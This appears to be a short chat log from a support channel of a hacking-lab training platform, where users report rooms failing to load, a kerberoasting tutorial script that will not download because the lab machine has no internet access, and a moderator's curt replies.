Hi, the room 'vulnversity' won't load. ? any help please ?

wheat fractal
wheat fractal
wheat fractal
#

Hi, for the room Corp, Im having trouble following the tutorial to do kerberoasting. When I try to download the powershell script, it keeps throwing remote server unreachable.

eternal summit
#

The machine doesn't have internet access

wheat fractal
#

is there an ETA for the fix?

eternal summit
#

No

teal barn
tranquil galleon
#

why does retro not give me any options to open the link

eternal summit
#

Not a bug, it's intentional

tranquil galleon
#

I already tried opening chrome and ie when I clicked it and still didn't work

eternal summit
#

Ok. It's not a bug, it's intentional.

tranquil galleon
#

😦

#

how dare u

wheat fractal
#

IT WORKS !!!! yeahhhh baby !!!!

#

Lucky you Metasploit still looping

wheat fractal